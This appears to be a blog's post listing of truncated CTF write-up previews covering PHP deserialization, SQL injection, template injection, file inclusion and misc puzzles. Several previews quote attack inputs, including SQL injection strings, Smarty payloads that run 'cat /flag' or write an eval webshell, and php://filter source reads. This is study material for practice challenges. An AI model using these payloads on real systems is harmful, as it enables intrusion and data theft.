- 博客(40)
- 收藏
- 关注
RSS订阅原创 TQLCTF-Simple PHP
注册登录,抓包发现有个地方有任意文件读取读取index.php关键代码if(preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0){ if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0){ $_POST['punctuation'] = preg_replace("/[a-z,A-Z,0- 9>\?]/","",$_POST['pun
2022-02-21 21:00:00
702
原创 HSC1-th CTF
打了一个早上加一个晚上,因为只会一点misc和web所以没怎么冲分,最后应该跌出前30了 毕竟都在藏flag我也有两道题没交 哈哈哈有些题没环境就没截图了WEBWeb-sign in签到题 提示robots.txt/robots.txt/fiag_ls_h3re.php因为禁用了右键和f12所以直接control+u得到flagCLICK一个小游戏,点击28800次才有flag,应该没人和我一样自动化脚本跑了28800次吧# -*- coding:utf-8 -*-from s
2022-02-21 20:56:39
690
原创 Code-Breaking 2018 Thejs(代码审计)
由于没找到环境,我这里只是为了学习这个知识点,所以找源码来分析一下源码:https://github.com/phith0n/code-breaking/tree/master/2018/thejsconst fs = require('fs')const express = require('express')const bodyParser = require('body-parser')const lodash = require('lodash')const session = requ
2022-02-06 02:03:46
1310
原创 长安“战疫”网络安全卫士守护赛writeup
长安“战疫”网络安全卫士守护赛writeupmisc八卦迷宫得到flagcazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}西安加油tcp流里面找到base64编码在线转为zip解压拼图得到flagcazy{make_XiAN_great_Again}webRCE_No_Para<?phpif(';' === preg_replace('/[^\W]+\((?R)
2022-01-09 16:11:42
4149
2
原创 [GFCTF 2021]Baby_Web(复现)
打开环境所以要我们读取上层目录的某个文件 所以我想应该会存在任意文件读取和路径穿越漏洞然后标签有CVE-2021-41773所以直接github拿到这个漏洞的工具payload我们来读一下index.php.txt<?phperror_reporting(0);define("main","main");include "Class.php";$temp = new Temp($_POST);$temp->display($_GET['filename']);?
2021-12-20 00:01:46
4601
1
原创 [天翼杯 2021]esay_eval(复现)
<?phpclass A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; }}class B{ function __destruct(){ echo $this->a->a();
2021-12-17 18:48:06
3009
原创 安洵杯【电成】
感觉是新生赛,但是不知道为啥办成公开赛,不理解webshell根据提示访问20211025232429.png!/Application/Runtime/Logs/Home/21_10_25.log找到/2591c98b70119fe624898b1e424b5e91.php(shell.php然后弱口令hack进入根目录得到flagflag{87b126f152ed3d89}mima账号:admin密码邮箱:[email protected]{49ba59abbe56e05
2021-12-15 23:48:27
1106
原创 极客大挑战2021-部分wp
DARK看到后缀去搜然后洋葱浏览器下载打开即可.SYC{hav3_fUn_1n_darK}welcome2021f12看到提示后,改为welcom的请求方式,直接curl -X 改请求方式。访问fllllaaaggg9.php发现这是个跳转页面,抓包发送一次得到flagSYC{WeLcom3_t0_Geek_2o21!!}babysql简单试了试1’union select 1,2,3,4#,发现有两个回显点先爆数据库1'union select group_concat(schem
2021-12-15 23:40:48
1347
原创 强网拟态线上赛-部分WP
webzerocalc计算器页面试试直接读flag,直接非预期new_hospital进入网站 抓包 发现cookie值有点东西是base64加密的.js,先修改成1.js的base64加密,看看有啥反应然后扫描目录得到一个老网站访问一下,在/old/feature.php,发现报错在这里可以任意文件读取,然后读取…/flag.php的base64加密miscWeirdPhoto进行长宽爆破import zlibimport struct
2021-12-15 23:28:27
1242
原创 CTF练习题
端午就该吃粽子打开环境没有界面直接目录扫描得到login.php访问得到发现存在文件包含试试目录跳跃,发现被过滤掉了那就直接php为协议读源码http://www.bmzclub.cn:22020/login.php?zhongzi=php://filter/read=convert.base64-encode/resource=index.php解码得到<?php error_reporting(0); if (isset($_GET['url'])) {
2021-12-15 23:23:24
4288
原创 phar反序列化+强制GC
<?phphighlight_file(__FILE__);class getflag { function __destruct() { echo getenv("FLAG"); }}class A { public $config; function __destruct() { if ($this->config == 'w') { $data = $_POST[0];
2021-12-14 21:18:56
1640
原创 特洛伊木马源攻击
L3HCTF的一道题当时沉迷于什么什么杯中,所以没怎么打现在来记录一下攻击原理cve-2021-42574<?phperror_reporting(0);if ("admin" == $_GET[username] & + !! & "CTFl3hctf" == $_GET[L3Hpassword]) { //Welcome to include "flag.php"; echo $flag;}show_source(__FI
2021-11-19 18:39:32
928
1
原创 [GWCTF 2019]枯燥的抽奖
在网络接口中发现有个check.php<?php#这不是抽奖程序的源代码!不许看!header("Content-Type: text/html;charset=utf-8");session_start();if(!isset($_SESSION['seed'])){$_SESSION['seed']=rand(0,999999999);}mt_srand($_SESSION['seed']);$str_long1 = "abcdefghijklmnopqrstuvwxyz012
2021-11-06 13:43:41
83
原创 [CISCN2019 华北赛区 Day1 Web2]ikun
打开环境 注册一个账号 进去发现提示随便点两页 直接写个脚本import requestsimport timeurl='http://d5a20c05-ae4a-43b6-9882-cd61dee0a934.node4.buuoj.cn:81/shop?page='for i in range(0,200): print(i) payload=url+str(i) a = requests.get(payload) if "lv6.png" in a.text:
2021-11-03 20:21:46
87
原创 CISCN_2019_WEB_1
打开环境是个网盘管理系统本来想试试照这个管理系统源码的没找到注册个号进去上传个图片发现只有下载和删除两个选项我们来抓包看看下载会不会任意文件下载发现可以那就直接这样读源码index.php<?phpinclude "class.php";$a = new FileList($_SESSION['sandbox']);$a->Name();$a->Size();?>class.php<?phperror_reporting(0);$dba
2021-10-24 23:56:30
3301
原创 0ctf_2016_unserialize
打开环境只有个登录框应该存在源码泄露,直接试试访问www.zip得到源码直接自动代码审计发现有疑似这些漏洞但是没有找到我们的反序列化,因为题目就是反序列化然后自己来审计一下在profile.php中$profile = unserialize($profile);$phone = $profile['phone'];$email = $profile['email'];$nickname = $profile['nickname'];$photo = base64_encode
2021-10-20 17:23:02
2874
原创 [2019]easy_serialize_php 1
打开环境得到源码<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);}if($_SESSION){ unset($_SESSIO
2021-09-28 00:13:36
1281
1
原创 BMZCTF-n1ctf/hard_php 88
打开环境得到登录框直接扫一下访问一下 config.php~<?phpheader("Content-Type:text/html;charset=UTF-8");date_default_timezone_set("PRC");session_start();class Db{ private $servername = "localhost"; private $username = "Nu1L"; private $password = "N
2021-09-22 22:03:23
115
原创 BMZCTF-WEB_ezeval
打开环境 <?phphighlight_file(__FILE__);$cmd=$_POST['cmd'];$cmd=htmlspecialchars($cmd);$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','in
2021-09-22 21:59:04
144
原创 Pokergame
下载附件得到压缩包解压得到然后hint里面的提示就是题目上的提示看看大小王属性只有一个可疑点然后压缩包是加密的 经过观察不是伪加密就图片这个信息应该是个提示 可能会用到ps直接010查看发现大鬼里面有pk小鬼里面有png直接是两个图片隐写然后直接foremost分离得到一个压缩包(大鬼) 一个二维码(小鬼)细心的会发现这个二维码差两个码头然后这个压缩包又是需要密码解压的再经过查看是个伪加密只需修改一下全局方式位标记 就行具体可以去学一下然后解压得到一个code.txt
2021-07-14 15:57:37
259
原创 [CISCN2019 华东南赛区]Web11 1
打开环境右上角有ip地址提示中有xff我就猜想会不会存在模板注入这里给一些smarty积累的payload{system('cat /flag')}{self::getStreamVariable("file:///etc/passwd")}{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php eval($_GET['cmd']); ?>",self::clearConfig())}常规利用{$smarty.v
2021-06-17 16:35:25
128
1
原创 [极客大挑战 2019]RCE ME 1
打开环境?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
2021-06-03 22:31:38
654
3
原创 php中一些不包含数字和字母的正则绕过
php中一些不包含数字和字母的webshelleg:<?phpif(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @eval($code);}思路:将我们需要的payload用非字母和数字的字符经过变换得到,然后知道能p
2021-06-03 22:16:12
1316
原创 [NCTF2019]True XML cookbook 1
之前写了个fake这次又来个ture打开环境明确是xxe直接抓包回显位还是1试试直接读flag<?xml version="1.0" ?><!DOCTYPE note [<!ENTITY M1kael SYSTEM "file:///flag">]><user><username>&M1kael;</username><password>123456</password>&
2021-05-30 15:31:22
688
原创 [CISCN 2019 初赛]Love Math 1
打开环境<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t',
2021-05-28 19:49:20
562
原创 [网鼎杯 2020 朱雀组]phpweb 1
打开环境这个人是真的丑有报错,翻译之后没什么提示进行目录爆破,没有什么发现那就来抓下包发现是个这个玩意百度发现func是call_user_func()call_user_func(函数, 参数),返回值为函数执行参数后的结果然后而p是一个参数不妨可以猜测用func来执行p所以来尝试一下构造func=show_source&p=index.php发现有返回,证明猜想成功,但被过滤了,那试试其他函数 <?php $disable_fun = arr
2021-05-24 21:22:25
369
1
原创 [安洵杯 2019]easy_web 1
打开环境源码中只有一个md is funny然后URL有一个img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=先试试模板注入发现不行,然后伪协议也不行,再爆破目录也不行所以再试着去把前面的照片先解码了TXpVek5UTTFNbVUzTURabE5qbase64两次解码得到3535352e706e67再16进制转字符串得到555.png发现这里应该是突破口所以我们试着来一下直接用这个点读flag.php先16进制编码再两次base64编码Tm
2021-05-24 18:12:35
2197
11
原创 [BJDCTF2020]ZJCTF,不过如此 1
打开环境可以的到<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(
2021-05-23 17:17:28
194
原创 [GXYCTF2019]禁止套娃 1
打开环境这个界面很熟悉看过我之前的博客关于git泄露的就知道先去爆破一下目录但是会发现没有什么进展,但我肯定它存在源码泄露所以我直接猜想一下是git泄露得到了index.php真就离谱<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET[
2021-05-23 12:28:26
180
3
原创 2017-赛客夏令营-weakphp
打开环境查看源码并没有什么发现怀疑存在源码泄露进行扫描发现确实存在git泄露进行回滚得到一个index.php<?phprequire_once "flag.php";if (!isset($_GET['user']) && !isset($_GET['pass'])) { header("Location: index.php?user=1&pass=2");}$user = $_GET['user'];$pass = $_GET['pas
2021-05-22 14:50:27
411
4
原创 Bugku noteasytrick
打开环境<?phperror_reporting(0);ini_set("display_errors","Off");class Jesen { public $filename; public $content; public $me; function __wakeup(){ $this->me = new Ctf(); } function __destruct() { $this->me-&
2021-05-21 14:55:36
2268
9
原创 NSCTF Code Php
打开环境查看源码发现问题访问<?phpif(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){ if(!strcmp($v
2021-05-14 19:44:39
167
原创 [网鼎杯 2020 青龙组]AreUSerialz 1
打开环境<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content =
2021-05-10 20:48:45
125
原创 Bugku web41
打开环境所以进行代码审计<?php// php版本:5.4.44header("Content-type: text/html; charset=utf-8");//请求头highlight_file(__FILE__);//高亮显示class evil{ public $hint;//定义变量 public function __construct($hint){//构造函数,主要实现重载功能 $this->hint = $hint;//为hi
2021-05-08 14:41:30
235
3
原创 [网鼎杯 2018]Fakebook 1
打开环境先申请一个账号进去没什么头绪,发现admin也能点,进去看看在URL上发现了注入点所以试试sql注入经过测试发现是数字型进行字段查询no=1 order by 4no=1 order by 5报错,说明只有四个字段然后进行简单查询发现union select被过滤了最先以为空格被过滤了,所以各种试,然后发现只有这个//union//select可以,经过了解,应该是防火墙的原因再次构造payloadno=0/**/union/**/select 1,2,3
2021-05-07 15:18:27
133
3
原创 [ZJCTF 2019]NiZhuanSiWei 1
打开环境于是进行代码审计<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1&
2021-05-06 20:35:56
261
2
原创 Bugku 杂项:种子
下载打开得到一张图片放入 010没有发现我们再看看属性发现去看看发现是一种图片隐写方式进过了解steghide info +文件 查看其中有隐藏的东西steghide extract -sf +文件 提取出123.txt查看其中内容 是个网址和密码得到一个压缩包和一个txt文件txt里面是 six six six然后通过字典破解发现666666是有效口令解压压缩包发现里面是个png图片然后在查看图片属性 发现高宽不同 试试修改高宽然后并没有发现什么拖到010
2021-05-04 22:42:07
110
原创 Bugku 聪明的php
进入环境发现: pass a parameter and maybe the flag file’s filename is random ????意思是传递一个参数所以我们get传参试试进行代码审计: 发现smarty是个模板,测试一下是不是模板注入所以 我们要了解一下smarty模板注入然后发现过滤了很多函数,但是passthru没有被过滤passthru()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmpl
2021-05-04 22:35:45
215
原创 [极客大挑战 2019]Http 1
打开环境发现是三叶草的技术小组的2019招新没看出来什么东西,所以查看源代码这个本来以为是提示,仔细探寻了一下好像只是介绍页面包装的语句再仔细找找发现了提示访问这个文件它需要我们从https://www.Sycsecret.com来访问它所以要进行伪造来绕过了所以bp抓包发送给重发器进行伪造那怎么伪造网址访问呢referer:服务器伪造然后它又说要用Syclover browser所以又要伪造浏览器所以这里修改User-Agent它有提示你说只需要本地ip链接就行
2021-04-26 17:56:57
5049
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人